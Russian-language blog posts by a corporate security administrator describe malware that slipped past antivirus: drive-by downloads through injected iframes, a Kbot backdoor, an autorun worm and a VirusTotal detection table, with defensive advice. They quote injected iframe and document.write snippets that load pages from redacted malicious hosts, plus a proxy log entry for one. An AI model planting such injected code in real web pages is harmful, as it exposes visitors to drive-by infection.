На страничку сайта как-то попадает ссылка на "нехороший" сайт, который хостит PDF, Java-апплет или Flash-ролик. Внутри PDF - JavaScript, который уже закачивает, возможно, с другого "нехорошего" сайта бинарник, представляющий собой зловред. Наш печальный опыт показывает, что подавляющее большинство этих зловредов не ловятся практически никаким антивирусом (использовали virustotal). Понятно, что антивирусы умирают, но жалко как-то: крутится на компе, поедает его ресурсы, а эффекта мало :-(

В логах прокси:
1.1.1.1 - "MSAD\BGates" [12/Oct/2011:06:10:06 +0400] "GET http://l65.in/stats8888/buble.php?key=rtgddfg%26u=root HTTP/1.0" 200 627 281 275 344 "http://<скрыто из этических соображений>/daily/25768/2753033/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)" "-" - "text/html" "default" 0.258 "-" TCP_MISS

Первая ссылка - куда пошел пользователь, вторая - Referrer - позволят предполагать откуда.
Не надо пытаться разрешить сайт
l65.in, по нашей статистике живут такие сайты не более месяца, в большинстве случаев - несколько дней.

На страничке сайта "Скрыто из этических соображений" это выглядит примерно так:
<script>
var rnd = Math.round(Math.random() * 100000);
document.write("<"+"if"+"rame src="+"http://{куда-то далеко}.in/if"+"rame.php?r="+rnd+"&id=8 width=100% height=975 marginwidth=0 marginheight=0 scrolling=no frameborder=0>");</script>

или совсем просто:

<iframe src="http://<тоже не близко>.in/wea54/06.php" height="0" width="0"></iframe>

Можно, пройти по этим iframe и покачать бинарники, попостить их на www.virustotal.com, от чего настроение ухудшится ибо хочется верить в эффективность моего антивируса.

Скажу сразу, что не все, что мы тут выкачивали из этих iframe-ов было зловредом. Такая же "технология" используется для интернет рекламы, сбора статистики посещений и раскрутки сайтов через счетчики посещений (заходя на сайт "скрыто из этических соображений" пользователи невольно заходят еще куда-то что фиксируется всякими трейсерами и кликосчетчиками). Вообще, зловред загружается со специального хостящего сайта, что создает широкое поле для фантазии админа сайта хостящего зловреды. В целом, могу предположить, что этим можно и неплохо зарабатывать.

Что же делать?

Безусловно, надо людям помогать, писать письма в сайты, что у них поселилось что-то. Но опыт показывает, что трудозатрат эти переписки стоят, а эффекта никакого: после нашей переписки с "скрыто из этических соображений" (известный сайт новостей) "что-то" было-таки удалено, но вскоре (на следующий день) появилось снова. Надо надеяться на себя. Что планируется предпринять:

1. Ужесточить загрузку бинарников из Интернет: загружать могут только кому надо, только откуда можно, только что нужно.
2. Если пользователь имеет мощные права (тем более админ домена, админ серверов критичных, хелпдеск с правами админа на всех десктопах и пр) - никакого интернет.. Отключить JavaScript в Acrobat-е. Можно через интерфейс - найти несложно, можно через реестр (предпочтительно, если операцию следует проделать, скажем, на 15 000 компьютеров):
HKCU\Software\Adobe\Adobe Acrobat\10.0\JSPrefs\bEnableJS = 0
4. Отключить все ненужные плагины в браузере. Вам нужно, чтобы документ Adobe показывался прямо из IE или Mozilla-ы? Мне это крайне неудобно.
5. Стараться ставить все обновления на Flash, Java, Adobe, Office.
6. Подумать об использование персональной HIPS или использовать сетевую IPS в активном режиме. Если антивирусы мертвы, то почему IPS - нет? Не знаю, но опыт показывает, что в конкретных сетевых атаках IPS достаточно эффективна. Смею предположить, что это связано с тем, что у IPS история короче и они не имеют еще многомегабайтных баз, а также с тем, что IPS фиксирует метод атаки, а антивирус конкретный контент (payload). Все-таки методов атак пока меньше, чем вариантов передаваемого зловреда. Последнее в защиту IPS: да, она шумит кучей событий, но опытному глазу этот шум помогает, а не мешает. Может, использование нейросетей и/или AI в антивирусах когда-нибудь станет реальностью и он будет так же эффективен сам собой, как (шумная IDS + опытный глаз), но пока счет не в их пользу. В целом, идея коллективной безопасности (или "безопасности из облаков") тут может быть эффективно, но тут диалектическая проблема: Зла уже столько, что перечислять его все уже менее эффективно, чем перечислять Добро.
7 (самое радикальное). Перейти на системы белого списка. Это как антивирус, только на оборот: они, в отличие от антивируса, который блокирует все Зло, - не блокируют Добро, но блокируют все остальное. Системы типа LAC или SolidCore и т.п. помогут.

Если у кого будет что добавить к написанному, буду крайне признателен.


ЗЫ: я тут вот писал этот пост, вставлял фрагменты с iframe, потом нажал Publish Post и начал его смотреть. Смотрю, а все мои iframe-ы из примеров выполнились и пытаются показать свои src. Да, блоги еще то зло - даже ломать ничего не надо!

Thursday, June 23, 2011

Антивирус мертв?

Ну и кто после подобного опровергнет утверждение: "Антивирус мертв"?!
В любом случае, наверное, следует согласиться с Шнаером что он лучше, чем его отсутствие.

Tuesday, April 27, 2010

В бой идут старики?

Друг и коллега предполагал, что антивирусные производители немного халтурят, выкидывая из своих антивирусных баз "старые" сигнатуры. В целом, понятно, а что им делать? Обыватель, выбирая антивирус, при компромиссе полнота сигнатурной базы - производительность, очевидно, выберет более производительное решение. Логично, что чем меньше база сигнатур, тем производительность - выше (я помню то светлое время, когда я впервые услышал о cureit, это было где-то в 2005, тогда ее размер был ~5Mb, а что сейчас - 38Mb! Всего-то 5 лет прошло.)
Вот и мне стало казаться, что старые сигнатуры все-таки выкидывают.


Смотрел в логи интернет-прокси и обнаружил тьму обращений на следующие сайты:

www.riyadh-cables.com
www.sabic.com
www.savola.com
Я так и не понял, что это за сайты, но чтобы не погубить прокси закрыл доступ к ним.
Затем посетил компьютер, с которого это все летело. Увидел примерно следующее (привожу реальный фрагмент, заменив IP-адреса):
....
TCP X.Y.Z.A:1071 112.9.10.0:80 FIN_WAIT_2

TCP X.Y.Z.A:1072 85.158.165.102:80 FIN_WAIT_2
TCP X.Y.Z.A:1073 85.158.165.102:80 FIN_WAIT_2
TCP X.Y.Z.A:1074 85.158.165.102:80 FIN_WAIT_2
TCP X.Y.Z.A:1075 85.158.165.102:80 FIN_WAIT_2
TCP X.Y.Z.A:1076 77.95.217.15:80 TIME_WAIT
TCP X.Y.Z.A:1077 85.158.165.102:80 FIN_WAIT_2
TCP X.Y.Z.A:1078 136.9.10.0:80 FIN_WAIT_2
TCP X.Y.Z.A:1079 85.158.165.102:80 SYN_SENT TCP X.Y.Z.A:1080 213.210.229.148:80 FIN_WAIT_2
TCP X.Y.Z.A:1081 213.210.229.148:80 FIN_WAIT_2
...
И такого безобразия ~ 5000 строк. IPS генерил кучу SYN_Flood-ов на те же адреса.
Название процесса мне так и не показали ни netstat -ano, ни tcpview. TcpView показало "неизвестный процесс". При перезагрузке все повторилось, решил, что оно где-то в авторане записано. Запустил autoruns, и после недолгого изучения нашел подозрительный сервис "Microsoft security update service", затем файлик mssrv32.exe в system32. Файлик сразу не удалился, так как был занят. Поубивал все "неизвестные процессы" вручную через TCPView, файлик стал дотупен. По дате и времени создания файлика понял, что это то, что я ищу:

Послал этот файлик на Virustotal.com, жаль отчет не сохранил (не до этого было), - из всего набора движков, только 4 в нем что-то нашли. Я сразу решил, что я на пороге "великого" открытия: мой пользователь словил вирус, о котром никому из великих не известно, ибо ни Kaspersky, ни DrWeb, ни McAfee не входили в перечень четырех.
Но... я поискал в Google, и увидел, что проблема эта - старая и, очевидно, сигнатура под это безобразие тогда же и была создана (Наместников Юрий из Лаборатории Касперского 15.09.2007 04:20 пишет: "mssrv32.exe_ - Backdoor.Win32.Kbot.d. Детектирование файла будет добавлено в следующее обновление."). Тем не менее, по мотивам высылки нами "образца" mssrv32.exe, сигнатура появилась в Kaspersky вместе с описанием.
Сегодня Virustotal вернул уже не 4, а 20.

Выводы, которые я для себя сделал:

  1. Антивирусы умрут рано или поздно. Чем заменить - системами "белых списков", - уже давно перечислить все хорошее и разрешить его проще, чем все плохое - и запретить.
  2. Антивирусные вендоры как-то обмениваются информацией. Мы послали "образец" только в McAfee, DrWeb и Kaspersky, но сигнатуры появились и у многих других участников Virustotal.com. Учитывая то, что проблема известна с 2007 года, у меня нет объяснений, почему многие другие именно сейчас "заопределяли" этот "образец".
  3. Если у вас есть антивирус, или даже три разных (оборона должна быть эшелонированной :-) ), вы не защищены от вредоносного ПО.

Tuesday, December 1, 2009

Автозапуск

Все знают что автозапуск (автоматическое исполнение некоторой программы при подключении носителя информации, такого как CD-диск или USB-накопитель) это зло. Причем дошло до того, что Microsoft выпустила обновление, отключающее эту функцию для USB-накопителей и сетевых папок (http://support.microsoft.com/kb/971029). Одновременно с этим, некоторые известные производители USB-накопителей пытаются "облегчить" жизнь пользователям с помощью продукта под названием U3 (http://www.u3.com/). По сути это технология, позволяющая заставить операционную систему думать что вставленная флешка (точнее один из разделов на ней) является CD-диском, и таким образом использовать автозапуск в обход ограничений. Все счастливы, ура. Microsoft может спокойно утверждать что они сделали что могли, производители флешек могут продолжать пользоваться автозапуском, а писатели вредоносного ПО не расстраиваться по поводу патча.

Wednesday, June 10, 2009

О "неправильном" вредоносном ПО, продолжение.

Я искренне верю, что это - последняя статья в этой печальной серии, поскольку мне действительно не хочется писать про одно и то же. Но здесь, при всей своей печальности ситуация более чем смешная.

Корпоративная служба безопасности, анализируя статистику вирусных заражений обнаружила, что существует ряд компьютеров, которые постоянно заражаются вирусами, несмотря на то, что на них стоит и исправно работает антивирусное ПО. Корреляция с журналами системы контроля доступа к периферийным устройствам показала, что заражающийся компьютер на съемные носители постоянно записывает autorun.exe
размером 37376 байт. При этом, наше антивирусное ПО никак не реагирует на этот autorun.exe. Согласитесь, подозрительно. Проверка альтенативным антивирусом обнаружила:

Еще более интересно, что оба файла имели одинаковый размер (те самые 37376) и одинковую сумму MD5 (ca82b32253f1cb11cf9e5ff83d87e01a):

Все банально и просто: вот оно, Virustotal подтвердил:

Антивирус

Версия

Обновление



Результат


a-squared

4.5.0.18

2009.06.09



P2P-Worm.Win32.Socks!IK


AhnLab-V3

5.0.0.2

2009.06.08



Win32/Socks.worm.37376


AntiVir

7.9.0.180

2009.06.08



Worm/Socks.FO


Antiy-AVL

2.0.3.1

2009.06.08



Worm/Win32.Socks


Authentium

5.1.2.4

2009.06.08



W32/Backdoor2.DJBR


Avast

4.8.1335.0

2009.06.08



Win32:Trojan-gen {Other}


AVG

8.5.0.339

2009.06.08



Win32/Heur


BitDefender

7.2

2009.06.09



Worm.Generic.28689


CAT-QuickHeal

10.00

2009.06.09



I-Worm.Socks.fo


ClamAV

0.94.1

2009.06.08



-


Comodo

1289

2009.06.09



Worm.Win32.Socks.~C


DrWeb

5.0.0.12182

2009.06.09



Win32.HLLW.Alupco.2


eSafe

7.0.17.0

2009.06.07



Suspicious File


eTrust-Vet

31.6.6548

2009.06.08



Win32/Ruternam.CZ


F-Prot

4.4.4.56

2009.06.08



W32/Backdoor2.DJBR


F-Secure

8.0.14470.0

2009.06.08



P2P-Worm.Win32.Socks.fo


Fortinet

3.117.0.0

2009.06.08



W32/Socks.FO!worm.p2p


GData

19

2009.06.09



Worm.Generic.28689


Ikarus

T3.1.1.59.0

2009.06.09



-


K7AntiVirus

7.10.757

2009.06.08



P2P-Worm.Win32.Socks


Kaspersky

7.0.0.125

2009.06.09



P2P-Worm.Win32.Socks.fo


McAfee

5640

2009.06.08



potentially unwanted program Generic PUP


McAfee+Artemis

5640

2009.06.08



potentially unwanted program Generic PUP


McAfee-GW-Edition

6.7.6

2009.06.09



Worm.Socks.FO


Microsoft

1.4701

2009.06.08



VirTool:Win32/Obfuscator.BO


NOD32

4139

2009.06.08



Win32/Zalup


Norman

6.01.09

2009.06.08



W32/Socks.BT


nProtect

2009.1.8.0

2009.06.09



Worm/W32.Socks.37376


Panda

10.0.0.14

2009.06.08



W32/Socks.E.worm


PCTools

4.4.2.0

2009.06.06



-


Prevx

3.0

2009.06.09



High Risk Cloaked Malware


Rising

21.33.10.00

2009.06.09



-


Sophos

4.42.0

2009.06.09



Troj/Agent-HMB


Sunbelt

3.2.1858.2

2009.06.09



P2P-Worm.Win32.Socks.fo


Symantec

1.4.4.12

2009.06.09



W32.Mandaph


TheHacker

6.3.4.3.342

2009.06.08



W32/Socks.fo


TrendMicro

8.950.0.1092

2009.06.08



WORM_SOCKS.CN


VBA32

3.12.10.6

2009.06.08



P2P-Worm.Win32.Socks.fo


ViRobot

2009.6.8.1773

2009.06.08



-


VirusBuster

4.6.5.0

2009.06.08



Worm.P2P.Socks.EY


Дополнительная информация

File size: 37376 bytes

MD5...: ca82b32253f1cb11cf9e5ff83d87e01a

SHA1..: ab73e86f1bbc3c27cfc1bf59424b8c6c682138ef

SHA256: b7a70b27c031e909ce6b83424f9689820b8a9eae588ae13d2161f38d2f79d57a

ssdeep: -

PEiD..: -

TrID..: File type identification
Win16/32 Executable Delphi generic (34.0%)
Generic Win/DOS Executable (32.9%)
DOS Executable Generic (32.8%)
Autodesk FLIC Image File (extensions: flc, fli, cel) (0.1%)

PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x2008b
timedatestamp.....: 0x48668f41 (Sat Jun 28 19:21:37 2008)
machinetype.......: 0x14c (I386)

( 5 sections )
name viradd virsiz rawdsiz ntrpy md5
.fasm 0x1000 0xef59 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
.rsrc 0x10000 0xead4 0x7400 7.99 6716f029b8658f46046b914de9e7053d
.masm 0x1f000 0x1000 0xe00 7.95 3e3c58b59c610e620960c39e3eeba9ab
. 0x20000 0x4c6 0x600 6.51 ce8903a56868195191ecedaa1bbbe0f1
.share 0x21000 0x282 0x400 3.36 210c71be3c729397ad819d970ba45184

( 1 imports )
> gdi32.dll: GetTextExtentPointA, CreateDCA, CreateDCA

( 0 exports )

PDFiD.: -

RDS...: NSRL Reference Data Set
-

Prevx info: http://info.prevx.com/aboutprogramtext.asp?PX5=D23C58B2006B8FC292B400BD8F4B1A00FBB8E8A8>


Видим, что написано у McAfee? Потенциально нежелательное ПО! Т.е. "потенциально нежелательное ПО" превращает мою машину в рассадник вирусов и прочего фактические нежелательного ПО.

Почитаем на Symantec: "W32.Mandaph is a worm that spreads through mapped and fixed drives and may download additional malware on to the compromised computer".
От себя хочу уточнить, что это этот червяк не просто "может" загружать вредоносный код, а фактически это делает, что мы и наблюдаем. И при всем при этом (самостоятельное распространение, загрузка из Интернет прочего вредоносного ПО) McAfee не удаляет это из принципиальных соображений - ответ от поддержки в данном случае был ровно как и в этом: докупите модуль "Anti-Spyware Enterprise" и все будет хорошо. Бред. Мне, как конечному пользователю, все равно, как классифицировал вендор эту нечисть, поставив антивирус, я хочу, чтобы он делал свою работу!

Вообще, в моей практике я видел массу случаев, когда антивирус не спасал. У коллеги начали уже появляться мысли о смене антивирусного вендора, но лично я не поддерживаю эту идею. Мое мнение таково, что какой бы не был антивирусный вендор, все равно будут находиться "экземпляры", которые он не определяет. Проблема здесь в концепции "Enumerated Badness", которая уже давно устарела. Наступит время, когда размер сигнатурных баз привысит порог, позволяющий антивирусу работать "в реальном времени" (да и вообще работать), и это время не за горами. Мой небольшой опыт использования CureIT показал, что за последние 2 года его размер увеличился почти в 3 раза! В общем, прогноз таков, что сигнатурные антивирусы доживают последние времена, поэтому, менять вендора не имеет смысла.
Что делать? Скажу банальные слова: используйте эшелонированную оборону: несколько систем безопасности и коррелируйте их журналы. Каждая система имеет свои приемущества, они дополнять друг друга.